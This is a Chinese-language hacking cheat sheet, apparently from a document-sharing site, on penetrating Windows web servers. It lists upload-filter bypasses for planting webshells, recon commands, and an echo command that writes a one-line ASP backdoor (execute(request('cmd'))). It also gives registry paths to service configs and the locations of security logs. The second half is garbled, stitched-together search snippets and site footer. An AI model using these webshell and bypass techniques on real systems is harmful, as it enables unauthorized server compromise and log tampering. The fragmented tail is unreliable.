入侵渗透中用到的一些技巧和思路
上传漏洞拿shell
1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell.
2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。
3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。
4.gif文件头欺骗
入侵渗透中用到的命令,语法
set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息
tasklist /svc 查看 服务对应的pid
netstat -ano
fsutil.exe fsinfo drives 列出全部盘符
dir d:\*conn*.* /s 找数据库连接文件
telnet 218.25.88.234 3389 对外部是否开放了这个端口目录
echo ^<%execute(request("cmd"))%^> >>e:\k\X.asp 写一句话到e:\k\目录,密码为
cmd.
type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp 传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp
注册表敏感信息
HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mysql 注册表位置
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 华众主机位置
HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\ serv-u 位置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters 1433端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\ 服务器ftp路径
服务器日志文件物理路径
安全日志文件:%systemroot%\system32\config \SecEvent.EVT
系统日志文件:%systemroot%\system32\config \SysEvent.EVT
应用程序日志文件:%systemroot%\system32\config \AppEvent.EVT
FTP连接日志和HTTPD事务日志:systemroot% \system32\LogFiles\,下面还有子文件夹,
分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
诺顿杀毒日志:C:\Documents and Settings\All Users\Application Data\Symantec
BY:康斯坦丁收集整理,
入侵渗透思路 入侵渗透涉及许多知识和技术,并不是一些人用一两招就可以搞定的。...测试方法是发送一大串包到某些随机选取的高端口,然后计算返回的不可到达包的数目...
入侵渗透的思路_IT/计算机_专业资料。入侵的一些思路今日推荐 180份文档 2014...入侵渗透中用到的一些技... 1页 1下载券喜欢此文档的还喜欢 ...
入侵渗透中用到的一些技... 1页 1下载券 入侵渗透思路 8页 1下载券 渗透测试...同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点...
记一次“另类”的入侵检测 12页 1财富值 一次典型的社会工程学渗透... 14页 8财富值 入侵渗透中用到的一些技巧... 1页 1财富值 入侵渗透思路 7页 8财富值...
2. 注册网站账户(注册时候看不懂别个说的啥,就用...邮箱欺骗,当然哪些FTP啥的弱口令的没算在社工里面。...入侵渗透的思路 20页 免费 网站入侵方法总结 4页 ...
网站渗透思路_计算机软件及应用_IT/计算机_专业资料。...3.asp(aspx) ACCESS拿shell一般只有3种方法,一是...10.猜路径或者文件在入侵中非常必要,猜不到路径的...
2010最新各种渗透入侵,提权的经验和技巧总结。2010最新...#地址池的范围是从192.168.3.1到192.168.3.254...然后用记事本打开“ex0111124.log”,删除里面的一些...
黑客攻击:入侵渗透思路 7页 2财富值 Web 服务器被...一些网络欺骗的手段, 最后就是社会工程的方法搞定...直接上下载软件(我这 里用的是 Flashget)下载它的...
入侵渗透第一课 入侵前言介绍_IT/计算机_专业资料。...使用方法: intext: 这个就是把网页中的正文内容中...入侵渗透的思路 20页 免费 渗透测试指南(更新版) ...
\0'字符在系统中被用作字符串结束的标志,'\0 '...可有两个方法实 现此目的, 一是采用黑客字典进行暴力...入侵渗透的思路 20页 免费 无线局域网的渗透与入侵...
入侵渗透中用过的三则VBS代码 入侵渗透入侵渗透隐藏>...脚本编程的技巧就是组合的技巧。XP和2003比2000自带...分享到: X 分享到: 使用一键分享,轻松赚取财富...
闽公网安备 35021102001881号 
热门文档